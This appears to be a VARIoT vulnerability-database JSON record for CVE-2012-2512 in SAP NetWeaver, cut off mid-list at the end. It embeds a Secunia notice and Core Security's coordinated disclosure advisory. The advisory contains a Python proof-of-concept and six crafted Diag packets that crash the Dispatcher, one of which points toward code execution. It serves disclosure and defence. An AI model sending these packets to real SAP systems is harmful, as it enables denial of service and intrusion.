Vendor notifies that the release date is still planned for May 8th, but due to quality control processes this date cannot be guaranteed. 2012-05-04: Core notifies that everything is ready for publication and requests the vendor to confirm the release date and the list of affected platforms (no reply received). 2012-05-07: Core asks again for the status of the fix. 2012-05-08: SAP notifies that they have released the security note 1687910 [4] on May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP also requests Core to remove all the technical information researched by Martin Gallo in [Sec. 8]. 2012-05-08: Core replies that the reporting of vulnerabilities is aimed at helping vulnerable users to understand and address the issues; the advisory will thus be released with the technical information. 2012-05-08: Advisory CORE-2012-0123 published.
- References
[1] http://www.sap.com/platform/netweaver/index.epx [2] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm [3] SAP's legal information, terms and conditions http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46.
[4] SAP security note 1687910 https://service.sap.com/sap/support/notes/1687910.
- About CoreLabs
CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
- Disclaimer
The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201205-0130",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.0 ehp1 (disp+work.exe 7010.29.15.58313)"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.0 ehp2 (disp+work.exe 7200.70.18.23869)"
},
{
"model": "netweaver ehp2",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver ehp1",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
}
],
"sources": [
{
"db": "BID",
"id": "53424"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002402"
},
{
"db": "NVD",
"id": "CVE-2012-2512"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-160"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:ehp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:ehp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2012-2512"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security - Corelabs",
"sources": [
{
"db": "BID",
"id": "53424"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-160"
}
],
"trust": 0.9
},
"cve": "CVE-2012-2512",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2012-2512",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2012-2512",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201205-160",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2012-2512",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2012-2512"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002402"
},
{
"db": "NVD",
"id": "CVE-2012-2512"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-160"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The DiagTraceStreamI function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet. SAP NetWeaver is prone to a remote code-execution vulnerability and multiple denial-of-service vulnerabilities. \nSuccessfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or crash the application. ----------------------------------------------------------------------\n\nBecome a PSI 3.0 beta tester!\nTest-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. \nDownload it here!\nhttp://secunia.com/psi_30_beta_launch\n\n----------------------------------------------------------------------\n\nTITLE:\nSAP NetWeaver Denial of Service and Code Execution Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA48980\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/48980/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=48980\n\nRELEASE DATE:\n2012-05-09\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/48980/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/48980/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=48980\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nCore Security Technologies has reported multiple vulnerabilities in\nSAP NetWeaver, which can be exploited by malicious people to cause a\nDoS (Denial of Service) and compromise a vulnerable system. \n\nThe vulnerabilities are reported in versions 7.0 EHP1 and 7.0 EHP2. \n\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nPROVIDED AND/OR DISCOVERED BY:\nMartin Gallo, Core Security Technologies. \n\nORIGINAL ADVISORY:\nhttp://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. *Advisory Information*\n\nTitle: SAP Netweaver Dispatcher Multiple Vulnerabilities\nAdvisory ID: CORE-2012-0123\nAdvisory URL:\nhttp://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities\nDate published: 2012-05-08\nDate of last update: 2012-05-08\nVendors contacted: SAP\nRelease mode: Coordinated release\n\n\n2. *Vulnerability Information*\n\nClass: Buffer overflow [CWE-119]\nImpact: Code execution, Denial of service\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512,\nCVE-2012-2513, CVE-2012-2514\n\n\n3. *Vulnerability Description*\n\nSAP Netweaver [1] is a technology platform for building and integrating\nSAP business applications. By sending different messages, the different\nvulnerabilities can be triggered. \n\n\n4. *Vulnerable packages*\n\n . SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313). SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869). Older versions are probably affected too, but they were not checked. \n\n\n5. *Non-vulnerable packages*\n\n . Vendor did not provide this information. \n\n\n6. *Vendor Information, Solutions and Workarounds*\n\nSAP released the security note\nhttps://service.sap.com/sap/support/notes/1687910 regarding these\nissues. Contact SAP for further information. \n\nMartin Gallo proposed the following actions to mitigate the impact of\nthe vulnerabilities:\n\n 1. Disable work processes\u0027 Developer Traces for the \u0027Dialog\nProcessing\u0027 component (for the vulnerabilities [CVE-2011-1516],\n[CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). \n 2. Restrict access to the Dispatcher service\u0027s TCP ports (3200/3299)\n(for all vulnerabilities). \n 3. Restrict access to the work process management transactions\nSM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the\nvulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and\n[CVE-2012-2512]). \n\n\n7. *Credits*\n\nThese vulnerabilities were discovered and researched by Martin Gallo\nfrom\nhttp://www.coresecurity.com/content/services-overview-core-security-consulting-services. \nThe publication of this advisory was coordinated by Fernando Miranda\nfrom http://www.coresecurity.com/content/corelabs-advisories . \n\n\n8. *Technical Description / Proof of Concept Code*\n\n*NOTE:* (The tracing of \u0027Dialog processing\u0027 has to be in level 2 or 3 in\norder to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511]\nand [CVE-2012-2512]). \n\nThe following python script can be used to reproduce the vulnerabilities\ndescribed below:\n\n/-----\nimport socket, struct\nfrom optparse import OptionParser\n\n# Parse the target options\nparser = OptionParser()\nparser.add_option(\"-l\", \"--hostname\", dest=\"hostname\", help=\"Hostname\",\ndefault=\"localhost\")\nparser.add_option(\"-p\", \"--port\", dest=\"port\", type=\"int\", help=\"Port\nnumber\", default=3200)\n(options, args) = parser.parse_args()\n\ndef send_packet(sock, packet):\n packet = struct.pack(\"!I\", len(packet)) + packet\n sock.send(packet)\n\ndef receive(sock):\n length = sock.recv(4)\n (length, ) = struct.unpack(\"!I\", length)\n data = \"\"\n while len(data)\u003clength:\n data+= sock.recv(length)\n return (length, data)\n\ndef initialize(sock):\n diagheader = \"\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\"\n user_connect =\n\"\\x10\\x04\\x02\\x00\\x0c\\x00\\x00\\x00\\xc8\\x00\\x00\\x04\\x4c\\x00\\x00\\x0b\\xb8\"\n support_data = \"\\x10\\x04\\x0b\\x00\\x20\"\n support_data+=\n\"\\xff\\x7f\\xfa\\x0d\\x78\\xb7\\x37\\xde\\xf6\\x19\\x6e\\x93\\x25\\xbf\\x15\\x93\"\n support_data+=\n\"\\xef\\x73\\xfe\\xeb\\xdb\\x51\\xed\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n dpheader =\n\"\\xff\\xff\\xff\\xff\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"\n dpheader+= struct.pack(\"I\", len(diagheader + user_connect +\nsupport_data))\n dpheader+=\n\"\\x00\\xff\\xff\\xff\\xff\\xff\\xff \"\n dpheader+= \"terminalXXXXXXX\"\n dpheader+=\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00 \n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n send_packet(sock, dpheader + diagheader + user_connect + support_data)\n\ndef send_message(sock, message):\n diagheader = \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n step = \"\\x10\\x04\\x26\\x00\\x04\\x00\\x00\\x00\\x01\"\n eom = \"\\x0c\"\n send_packet(sock, diagheader + step + message + eom)\n\n# Connect and send initialization packet\nconnection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nconnection.connect((options.hostname, options.port))\ninitialize(connection)\nreceive(connection) \n\n-----/\n In the following subsections, we give the python code that can be added\nafter the script above in order to reproduce all vulnerabilities. \n\n\n8.1. *SAP Netweaver DiagTraceR3Info Vulnerability*\n\n[CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver\n\u0027disp+work.exe\u0027 module process a specially crafted network packet. \nMalicious packets are processed by the vulnerable function\n\u0027DiagTraceR3Info\u0027 in the \u0027disp+work.exe\u0027 module when the Developer Trace\nis configured at levels 2 or 3 for the \"Dialog processor\" component of\nthe \"Dialog\" work process handling the packet [2]. The\nfollowing python code can be used to trigger the vulnerability:\n\n/-----\ncrash = \"X\"*114 + \"\\xff\\xff\" # --\u003e Unicode Address to call !\ncrash+= \"Y\"*32\ncrash = \"\\x10\\x06\\x20\" + struct.pack(\"!H\", len(crash)) + crash\nsend_message(connection, crash)\n-----/\n\n\n\n8.2. This vulnerability could allow a\nremote unauthenticated attacker to conduct a denial of service attack\nagainst the vulnerable systems. The following python code can be used to\ntrigger the vulnerability:\n\n/-----\ncrash = \"\\x12\\x04\\x18\\xff\\xff\\xff\\xffCrash!\"\nsend_message(connection, crash)\n-----/\n\n\n\n8.3. This vulnerability could allow a remote\nunauthenticated attacker to conduct a denial of service attack. The\nfollowing python code can be used to trigger the vulnerability:\n\n/-----\ncrash = \"\\x12\\x09\\x02\\x00\\x00\\x00\\x08\" + \"\\x80\"*8\nsend_message(connection, crash)\n-----/\n\n\n\n8.4. \n\n/-----\ncrash = \"\\x10\\x13\\x09\\x00\\xFF\\x12\\x1A\\x59\\x51\"\nsend_message(connection, crash)\n-----/\n\n\n\n8.5. \n\n/-----\ncrash = \"\\x10\\x0c\\x0e\\x00\\0a\" + \"A\"*10\nsend_message(connection, crash)\n-----/\n\n\n\n8.6. This\nvulnerability could allow a remote unauthenticated attacker to conduct a\ndenial of service attack. \n\n/-----\ncrash = \"\\x10\\x0f\\x01\\x00\\x11\" + \"A\"*17\nsend_message(connection, crash)\n-----/\n\n\n\n9. *Report Timeline*\n\n. 2012-01-24:\nCore Security Technologies notifies the SAP team of the vulnerability,\nsetting the estimated publication date of the advisory for February\n21st, 2012. 2012-01-24:\nCore sends an advisory draft with technical details. 2012-01-24:\nThe SAP team confirms the reception of the issue and asks to use the\nsecurity ID 582820-2012 for further communication. SAP also notifies its\nterms and conditions [3], and asks for Core to commit to that guideline. 2012-02-01:\nThe Core Advisories Team communicates that it has its own guidelines for\nthe advisories publication process, which may conflict with SAP\u0027s\nguidelines. In particular, Core does not guarantee that the publication\nof the advisory will be postponed until a fix or patch is made available\nby SAP. If information about this vulnerability is partially or\ncompletely leaked by a third party, the advisory would be released\nimmediately as forced release. Despite this, the Core team commits to\ncomply with SAP\u0027s guidelines as much as possible. 2012-02-21:\nFirst release date missed. 2012-02-22:\nCore asks for the status of the fix and notifies that the release date\nwas missed. 2012-02-23:\nSAP notifies that, because the development team has to downport the\nsolutions for a huge bunch of software releases, the earliest release\ndate for the patches would be May 8th 2012. 2012-02-23:\nCore re-schedules the advisory publication to May 8th. 2012-04-16:\nCore asks if the patching process is still on track to release patches\non May 8th and requests a status of the fix. 2012-04-16:\nVendor notifies that the release date is still planned for May 8th, but\ndue to quality control processes this date cannot be guaranteed. 2012-05-04:\nCore notifies that everything is ready for publication and requests the\nvendor to confirm the release date and the list of affected platforms\n(no reply received). 2012-05-07:\nCore asks again for the status of the fix. 2012-05-08:\nSAP notifies that they have released the security note 1687910 [4] on\nMay Patch Day 2012 and asks to include that information in [Sec. 6]. SAP\nalso requests Core to remove all the technical information researched by\nMartin Gallo in [Sec. 8]. 2012-05-08:\nCore replies that the reporting of vulnerabilities is aimed at helping\nvulnerable users to understand and address the issues; the advisory will\nthus be released with the technical information. 2012-05-08:\nAdvisory CORE-2012-0123 published. \n\n\n\n10. *References*\n\n[1] http://www.sap.com/platform/netweaver/index.epx\n[2]\nhttp://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm\n[3] SAP\u0027s legal information, terms and conditions\nhttp://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46. \n\n[4] SAP security note 1687910\nhttps://service.sap.com/sap/support/notes/1687910. \n\n\n11. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://corelabs.coresecurity.com. \n\n\n12. *About Core Security Technologies*\n\nCore Security Technologies enables organizations to get ahead of threats\nwith security test and measurement solutions that continuously identify\nand demonstrate real-world exposures to their most critical assets. Our\ncustomers can gain real visibility into their security standing, real\nvalidation of their security controls, and real metrics to more\neffectively secure their organizations. \n\nCore Security\u0027s software solutions build on over a decade of trusted\nresearch and leading-edge threat expertise from the company\u0027s Security\nConsulting Services, CoreLabs and Engineering groups. Core Security\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\nhttp://www.coresecurity.com. \n\n\n13. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2012 Core Security\nTechnologies and (c) 2012 CoreLabs, and are licensed under a Creative\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n14. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
"db": "NVD",
"id": "CVE-2012-2512"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002402"
},
{
"db": "BID",
"id": "53424"
},
{
"db": "VULMON",
"id": "CVE-2012-2512"
},
{
"db": "PACKETSTORM",
"id": "112569"
},
{
"db": "PACKETSTORM",
"id": "112538"
}
],
"trust": 2.16
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=20705",
"trust": 0.2,
"type": "exploit"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2012-2512"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2012-2512",
"trust": 2.9
},
{
"db": "SECTRACK",
"id": "1027052",
"trust": 1.1
},
{
"db": "BID",
"id": "53424",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002402",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "48980",
"trust": 0.7
},
{
"db": "NSFOCUS",
"id": "19579",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201205-160",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "20705",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2012-2512",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "112569",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "112538",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2012-2512"
},
{
"db": "BID",
"id": "53424"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002402"
},
{
"db": "PACKETSTORM",
"id": "112569"
},
{
"db": "PACKETSTORM",
"id": "112538"
},
{
"db": "NVD",
"id": "CVE-2012-2512"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-160"
}
]
},
"id": "VAR-201205-0130",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.2949160133333333
},
"last_update_date": "2023-12-18T12:22:02.488000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Acknowledgments to Security Researchers",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"title": "martingalloar",
"trust": 0.1,
"url": "https://github.com/martingalloar/martingalloar "
},
{
"title": "publications",
"trust": 0.1,
"url": "https://github.com/martingalloar/publications "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2012-2512"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002402"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-002402"
},
{
"db": "NVD",
"id": "CVE-2012-2512"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"trust": 1.8,
"url": "https://service.sap.com/sap/support/notes/1687910"
},
{
"trust": 1.7,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id?1027052"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75454"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2512"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-2512"
},
{
"trust": 0.7,
"url": "http://www.securityfocus.com/bid/53424"
},
{
"trust": 0.6,
"url": "http://secunia.com/advisories/48980"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/19579"
},
{
"trust": 0.4,
"url": "http://www.sap.com/platform/netweaver/index.epx"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/119.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/martingalloar/martingalloar"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/20705/"
},
{
"trust": 0.1,
"url": "http://secunia.com/psi_30_beta_launch"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=48980"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/48980/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/48980/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/content/services-overview-core-security-consulting-services."
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-2511"
},
{
"trust": 0.1,
